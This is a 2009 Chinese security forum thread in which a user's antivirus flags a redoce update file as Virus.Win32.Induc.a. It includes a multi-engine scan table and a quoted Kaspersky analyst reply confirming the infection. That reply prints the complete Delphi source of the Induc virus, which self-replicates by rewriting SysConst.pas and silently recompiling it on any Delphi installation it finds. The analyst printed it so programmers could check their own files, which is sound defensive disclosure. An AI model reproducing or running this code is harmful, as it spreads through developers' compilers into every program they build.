是不是误报？？？（卡巴回信，说不是误报 4楼为回信详细内容）

幸福的猪猪

刚才升级了一下redoce的版本，没想到卡巴斯基报病毒咯。。。（是其升级包里面的某个文件被识别曾经被感染过咯？）





点击清除之后，redoce可以正常启动（就是不知道里面的功能有没有打折）。。。

password：virus


以误报的格式，上报卡巴斯基，等待结果。

清除之后的样本，一起上传。

[ 本帖最后由 幸福的猪猪 于 2009-8-17 04:49 编辑 ]

hddu

清除之后的样本



[ 本帖最后由 hddu 于 2009-8-16 17:12 编辑 ]

z2665

文件信息文件名称 :          Redemdl.rar
文件大小 :          54170 byte
文件类型 :          RAR archive data, v1d, os
MD5 :          4e99cb4d392b965dc3e8c9ff5b27bdb1
SHA1 :          f29fec0cc4ff5624a1d0fb36615060cb5865acea

扫描结果扫描结果 :          8%的杀软(3/37)报告发现病毒
时间 :          2009/08/16 17:14:56 (CST)
软件名称         引擎版本        病毒库版本        病毒库时间        扫描结果        时间
a-squared        4.5.0.3        20090815010138        2009-08-15        -        0.368
AntiVir        8.2.1.1        7.1.5.117        2009-08-14        -        0.496
Arcavir        2009        200908151354        2009-08-15        -        0.055
Authentium        5.1.1        200908151759        2009-08-15        -        1.517
AVAST!        4.7.4        090815-0        2009-08-15        -        0.012
AVG        8.5.288        270.13.58/2306        2009-08-16        -        0.340
BitDefender        7.81008.3880415        7.27184        2009-08-16        -        3.345
CA (VET)        9.0.0.143        31.6.6677         2009-08-15        -        6.361
ClamAV        0.95.2        9702        2009-08-16        -        0.029
Comodo        3.10        1987        2009-08-16        -        0.715
CP Secure        1.1.0.715        2009.08.14        2009-08-14        -        12.054
Dr.Web        4.44.0.9170        2009.08.16        2009-08-16        -        5.184
F-Prot        4.4.4.56        20090815        2009-08-15        -        1.485
F-Secure        7.02.73807        2009.08.16.03        2009-08-16        Virus.Win32.Induc.a [AVP]        0.087
GData        19.7167/19.440        20090816        2009-08-16        Virus.Win32.Induc.a [Engine:A]        4.716
Ikarus        T3.1.01.64        2009.08.16.73247        2009-08-16        -        4.193
Microsoft        1.4903        2009.08.15        2009-08-15        -        5.597
Norman        6.01.09        6.01.00        2009-08-14        -        4.008
nProtect        20090816.01        5054570        2009-08-16        -        6.013
Quick Heal        10.00        2009.08.13        2009-08-13        -        1.181
Sophos        2.89.1        4.44        2009-08-16        -        3.149
Sunbelt        5336        5336        2009-08-15        -        1.426
The Hacker        6.3.4.3        v00383        2009-08-12        -        0.669
VBA32        3.12.10.9        20090815.1958        2009-08-15        -        1.848
ViRobot        20090814        2009.08.14        2009-08-14        -        0.425
VirusBuster        4.5.11.10        10.112.6/1792870        2009-08-15        -        2.401
卡巴斯基        5.5.10        2009.08.16        2009-08-16        Virus.Win32.Induc.a        0.058
安博士V3        2009.08.15.01        2009.08.15        2009-08-15        -        0.822
安天        2.0.18        20090816.2711867        2009-08-16        -        0.123
江民杀毒        11.0.800        2009.08.16        2009-08-16        -        3.606
熊猫卫士        9.05.01        2009.08.15        2009-08-15        -        2.895
瑞星        20.0        21.42.60.00        2009-08-16        -        0.883
赛门铁克        1.3.0.24        20090815.003        2009-08-15        -        0.052
趋势科技        8.700-1004        6.366.20        2009-08-15        -        0.035
迈克菲        5.3.00        5710        2009-08-15        -        3.120
金山毒霸        2009.2.5.15        2009.8.15.22        2009-08-15        -        0.481
飞塔        2.81-3.120        10.722        2009-08-16        -        0.234

幸福的猪猪

RE: False alarm [KLAN-40418281]
Hello,

Redemdl.dll - Virus.Win32.Induc.a

This is not false alarm.

This is a new type of virus. It can infect Delphi source files, so when you compile your program, it will contain virus code. If you are a programmer, please check your source files (including standard Delphi .pas files) for the following virus code:

uses windows;

var sc:array[1..24] of string=('uses windows; var sc:array[1..24] of string=(',
'function x(s:string):string;var i:integer;begin for i:=1 to length(s) do if s',
'=#36 then s:=#39;result:=s;end;procedure re(s,d,e:string);var f1,f2:textfile;',
'h:cardinal;f:STARTUPINFO;p:PROCESS_INFORMATION;b:boolean;t1,t2,t3:FILETIME;begin',
'h:=CreateFile(pchar(d+$bak$),0,0,0,3,0,0);if h<>DWORD(-1) then begin CloseHandle',
'(h);exit;end;{$I-}assignfile(f1,s);reset(f1);if ioresult<>0 then exit;assignfile',
'(f2,d+$pas$);rewrite(f2);if ioresult<>0 then begin closefile(f1);exit;end; while',
'not eof(f1) do begin readln(f1,s); writeln(f2,s); if pos($implementation$,s)<>0',
'then break;end;for h:= 1 to 1 do writeln(f2,sc[h]);for h:= 1 to 23 do writeln(f2',
',$$$$+sc[h],$$$,$);writeln(f2,$$$$+sc[24]+$$$);$);for h:= 2 to 24 do writeln(f2,',
'x(sc[h]));closefile(f1);closefile(f2);{$I+}MoveFile(pchar(d+$dcu$),pchar(d+$bak$',
')); fillchar(f,sizeof(f),0); f.cb:=sizeof(f); f.dwFlags:=STARTF_USESHOWWINDOW;f.',
'wShowWindow:=SW_HIDE;b:=CreateProcess(nil,pchar(e+$"$+d+$pas"$),0,0,false,0,0,0,',
'f,p);if b then WaitForSingleObject(p.hProcess,INFINITE);MoveFile(pchar(d+$bak$),',
'pchar(d+$dcu$));DeleteFile(pchar(d+$pas$));h:=CreateFile(pchar(d+$bak$),0,0,0,3,',
'0,0); if h=DWORD(-1) then exit; GetFileTime(h,@t1,@t2,@t3); CloseHandle(h);h:=',
'CreateFile(pchar(d+$dcu$),256,0,0,3,0,0);if h=DWORD(-1) then exit;SetFileTime(h,',
'@t1,@t2,@t3); CloseHandle(h); end; procedure st; var k:HKEY;c:array [1..255] of',
'char; i:cardinal; r:string; v:char; begin for v:=$4$ to $7$ do if RegOpenKeyEx(',
'HKEY_LOCAL_MACHINE,pchar($Software\Borland\Delphi\$+v+$.0$),0,KEY_READ,k)=0 then',
'begin i:=255;if RegQueryValueEx(k,$RootDir$,nil,@i,@c,@i)=0 then begin r:=$$;i:=',
'1; while c<>#0 do begin r:=r+c;inc(i);end;re(r+$\source\rtl\sys\SysConst$+',
'$.pas$,r+$\lib\sysconst.$,$"$+r+$\bin\dcc32.exe" $);end;RegCloseKey(k);end; end;',
'begin st; end.');

function x(s:string):string;
var
i:integer;
begin
for i:=1 to length(s) do
if s=#36 then s:=#39;
result:=s;
end;

procedure re(s,d,e:string);
var
f1,f2:textfile;
h:cardinal;
f:STARTUPINFO;
p:PROCESS_INFORMATION;
b:boolean;
t1,t2,t3:FILETIME;
begin
h:=CreateFile(pchar(d+'bak'),0,0,0,3,0,0);
if h<>DWORD(-1) then
begin
CloseHandle(h);
exit;
end;
{'I-}assignfile(f1,s);
reset(f1);
if ioresult<>0 then
exit;
assignfile(f2,d+'pas');
rewrite(f2);
if ioresult<>0 then
begin
closefile(f1);
exit;
end;

while not eof(f1) do
begin
readln(f1,s);
writeln(f2,s);
if pos('implementation',s)<>0 then
break;
end;

for h:= 1 to 1 do
writeln(f2,sc[h]);
for h:= 1 to 23 do
writeln(f2,''''+sc[h],''',');
writeln(f2,''''+sc[24]+''');');
for h:= 2 to 24 do
writeln(f2,x(sc[h]));
closefile(f1);
closefile(f2);
{'I+}MoveFile(pchar(d+'dcu'),pchar(d+'bak'));
fillchar(f,sizeof(f),0);
f.cb := sizeof(f);
f.dwFlags := STARTF_USESHOWWINDOW;
f.wShowWindow := SW_HIDE;
b := CreateProcess(nil,pchar(e+'"'+d+'pas"'),0,0,false,0,0,0,f,p);
if b then
WaitForSingleObject(p.hProcess,INFINITE);
MoveFile(pchar(d+'bak'),pchar(d+'dcu'));
DeleteFile(pchar(d+'pas'));
h := CreateFile(pchar(d+'bak'),0,0,0,3,0,0);
if h=DWORD(-1) then
exit;
GetFileTime(h,@t1,@t2,@t3);
CloseHandle(h);
h := CreateFile(pchar(d+'dcu'),256,0,0,3,0,0);
if h=DWORD(-1) then
exit;
SetFileTime(h,@t1,@t2,@t3);
CloseHandle(h);
end;

procedure st;
var
k:HKEY;
c:array [1..255] of char;
i:cardinal;
r:string;
v:char;
begin
for v:='4' to '7' do
if RegOpenKeyEx(HKEY_LOCAL_MACHINE,pchar('Software\Borland\Delphi\'+v+'.0'),0,KEY_READ,k)=0 then
begin
i:=255;
if RegQueryValueEx(k,'RootDir',nil,@i,@c,@i)=0 then
begin
r:='';
i:=1;
while c<>#0 do
begin
r:=r+c;
inc(i);
end;
re(r+'\source\rtl\sys\SysConst'+'.pas',r+'\lib\sysconst.','"'+r+'\bin\dcc32.exe" ');
end;
RegCloseKey(k);
end;
end;

begin
st;
end.

> False alarm
>
>
> False alarm
>
> password:virus
>
>
>
>
>
>
Best Regards,
Oleg Yurzin

Malware Analyst
Kaspersky Lab

第一次收到有这么多内容的回信。。。

[ 本帖最后由 幸福的猪猪 于 2009-8-17 04:50 编辑 ]

post8

红伞美报

guohouzuo

这病毒挺有意思，专门感染delphi的代码。。

IllusionWing

已经联系作者了

luxiao200888

作者好久不见了

jason_jiang

to ESET

qianwenxiang

dll确实有点小问题 0x5bd4居然有代码……搞不好我delphi被感染了